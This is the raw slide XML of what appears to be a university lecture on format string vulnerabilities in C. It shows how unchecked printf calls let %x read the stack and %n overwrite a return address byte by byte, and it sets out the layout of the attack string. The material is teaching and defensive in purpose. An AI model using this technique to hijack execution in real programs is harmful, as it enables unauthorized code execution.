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sldIdLst>
    <p:sldId id="412" r:id="rId2"/>
    <p:sldId id="359" r:id="rId3"/>
    <p:sldId id="414" r:id="rId4"/>
    <p:sldId id="413" r:id="rId5"/>
    <p:sldId id="415" r:id="rId6"/>
    <p:sldId id="419" r:id="rId7"/>
    <p:sldId id="420" r:id="rId8"/>
    <p:sldId id="423" r:id="rId9"/>
    <p:sldId id="424" r:id="rId10"/>
    <p:sldId id="425" r:id="rId11"/>
    <p:sldId id="426" r:id="rId12"/>
    <p:sldId id="422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21" r:id="rId21"/>
    <p:sldId id="434" r:id="rId22"/>
    <p:sldId id="435" r:id="rId23"/>
    <p:sldId id="436" r:id="rId24"/>
    <p:sldId id="418" r:id="rId25"/>
    <p:sldId id="417" r:id="rId2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69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0" autoAdjust="0"/>
    <p:restoredTop sz="91045" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="-6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Relationship Id="rId2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example would be safe if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> line was: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("%s", line);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3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Format String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functions are safe when they are used correctly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Format string vulnerabilities arise when programmer accidently allows the user to control the input string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stdin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20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0-15 at 3.2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-5457"/>
            <a:ext cx="8214940" cy="65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3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Harmless Input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2017-10-15 at 4.0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631"/>
            <a:ext cx="9144000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1433"/>
      </p:ext>
    </p:extLst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Manipulated Input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2017-10-15 at 4.0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245"/>
            <a:ext cx="9144000" cy="1155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472514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internal function call looks something like this: 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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(string, format_arg1, format_arg2, 200,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0,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71146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Environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2017-10-15 at 5.0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152"/>
            <a:ext cx="9144000" cy="32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0322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Input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2017-10-15 at 5.0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" y="2924944"/>
            <a:ext cx="8432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146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Manipulated Input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833"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="755576" y="4005064"/>
          <a:ext cx="2160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buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="CCFFCC"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>line</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="CCFFCC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address of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="CCFFCC"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>line</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1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Screen Shot 2017-10-15 at 6.3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245"/>
            <a:ext cx="9144000" cy="1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146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Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2017-10-15 at 8.4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6728184" cy="2232248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2017-10-15 at 8.4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" y="4725144"/>
            <a:ext cx="641836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4554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Write to Return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2017-10-16 at 8.09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484784"/>
            <a:ext cx="76835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7780"/>
      </p:ext>
    </p:extLst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Write to Return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2017-10-16 at 9.0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391"/>
            <a:ext cx="9144000" cy="14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84745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 smtClean="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ormat String</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-AU" sz="36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String with conversion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>specifiers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:latin typeface="Times" pitchFamily="-110" charset="0"/>
              </a:rPr>
              <a:t>Common formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times" pitchFamily="-110" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screen Shot 2017-10-14 at 10.2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18284"/>
            <a:ext cx="8712200" cy="3467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2C8DD0C-F5BD-3541-BD02-844AE7581974}" type="slidenum">
              <a:rPr lang="en-US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84176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Using %n to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Mung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> Return Address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228600" y="2620963"/>
            <a:ext cx="845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28600" y="3306763"/>
            <a:ext cx="845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862763" y="2620963"/>
            <a:ext cx="746125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406400" y="2620963"/>
            <a:ext cx="3632200" cy="685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ja-JP" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>… attackString%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack code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86200" y="2419350"/>
            <a:ext cx="3532188" cy="1884363"/>
            <a:chOff x="2287" y="1524"/>
            <a:chExt cx="2225" cy="1187"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10259" name="Rectangle 8" descr="Large checker board"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2592" y="1651"/>
              <a:ext cx="528" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="lgCheck">
              <a:fgClr>
                <a:srgbClr val="FFCCCC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&amp;RET</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10260" name="AutoShape 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2287" y="2160"/>
              <a:ext cx="1756" cy="551"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -20111"/>
                <a:gd name="adj2" fmla="val -8443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Overwrite location under printf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>s stack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pointer with RET address; then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printf(buffer) will write the number of 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characters in attackString into RET</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10261" name="Freeform 10"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2880" y="1524"/>
              <a:ext cx="1632" cy="252"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 958"/>
                <a:gd name="T1" fmla="*/ 192 h 252"/>
                <a:gd name="T2" fmla="*/ 5325 w 958"/>
                <a:gd name="T3" fmla="*/ 0 h 252"/>
                <a:gd name="T4" fmla="*/ 2812060 w 958"/>
                <a:gd name="T5" fmla="*/ 1 h 252"/>
                <a:gd name="T6" fmla="*/ 2829208 w 958"/>
                <a:gd name="T7" fmla="*/ 252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252"/>
                <a:gd name="T14" fmla="*/ 958 w 958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252">
                  <a:moveTo>
                    <a:pt x="0" y="192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958" y="25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9" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7151688" y="31242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2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="3551238"/>
            <a:ext cx="1012825" cy="550862"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -75486"/>
              <a:gd name="adj2" fmla="val -1541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Return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execution to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this address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10251" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2171700" y="633413"/>
            <a:ext cx="152400" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1958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AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1968500" y="1752600"/>
            <a:ext cx="2832100" cy="582613"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69292"/>
              <a:gd name="adj2" fmla="val -3731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Buffer with attacker-supplied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1480719" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="661988" y="3429000"/>
            <a:ext cx="1825625" cy="665163"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20111"/>
              <a:gd name="adj2" fmla="val -8443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Number of characters in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attackString must be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equal to … what?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11281" name="Freeform 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2943225" y="3276600"/>
            <a:ext cx="4252913" cy="1096963"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 2679"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 691"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2679"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 691"/>
              <a:gd name="T4" fmla="*/ 0 w 2679"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 691"/>
              <a:gd name="T6" fmla="*/ 0 w 2679"/>
              <a:gd name="T7" fmla="*/ 0 h 691"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2679"/>
              <a:gd name="T13" fmla="*/ 0 h 691"/>
              <a:gd name="T14" fmla="*/ 2679 w 2679"/>
              <a:gd name="T15" fmla="*/ 691 h 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9" h="691">
                <a:moveTo>
                  <a:pt x="2679" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2452" y="691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="69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AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="301625" y="4495800"/>
            <a:ext cx="7721600" cy="134143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 has a concise way of printing multiple symbols: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%Mx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will print exactly M bytes (taking them from the stack).  If attackString contains enough </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%Mx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> so that  its total length is equal to the most significant byte of the address of the attack code,  this byte will be written into &amp;RET.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Repeat three times (four </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in total) to write into &amp;RET+1, &amp;RET+2, &amp;RET+3, replacing RET with the address of attack code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1480724" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="98425" y="1411288"/>
            <a:ext cx="1619250" cy="874712"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1273"/>
              <a:gd name="adj2" fmla="val 13207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This portion contains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enough % symbols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to advance printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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internal stack pointer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1730375" y="4256088"/>
            <a:ext cx="47783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19" grpId="0" animBg="1"/>
      <p:bldP spid="11281" grpId="0" animBg="1"/>
      <p:bldP spid="11282" grpId="0" animBg="1"/>
      <p:bldP spid="14807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Exact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573016"/>
            <a:ext cx="3970784" cy="3384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FFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>writes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd600 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>byte by byte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First byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>256 (0x100)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> long string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write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one byte higher than the last, write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xd6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x1d6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> long string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Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to extend string to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x1ff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Write second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to extend string to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x2ff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Picture 3" descr="Screen Shot 2017-10-16 at 9.2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90" y="2276872"/>
            <a:ext cx="4583014" cy="25808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72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FFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>writes to a memory location the number of bytes that have been created so far by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf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5" y="27809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not practical to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>create a string that's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd600 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bytes long and then have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3337319089"/>
      </p:ext>
    </p:extLst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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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address to write in reverse hex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Four bytes (anything will do, we use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>junk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The address to write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in reverse hex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Four bytes (anything will do, we use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>junk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The address to write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in reverse hex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Four bytes (anything will do, we use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>junk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The address to write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in reverse hex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One less than the number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%8x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'s so the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function is using arguments from the start of the input string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pairs of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%#x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
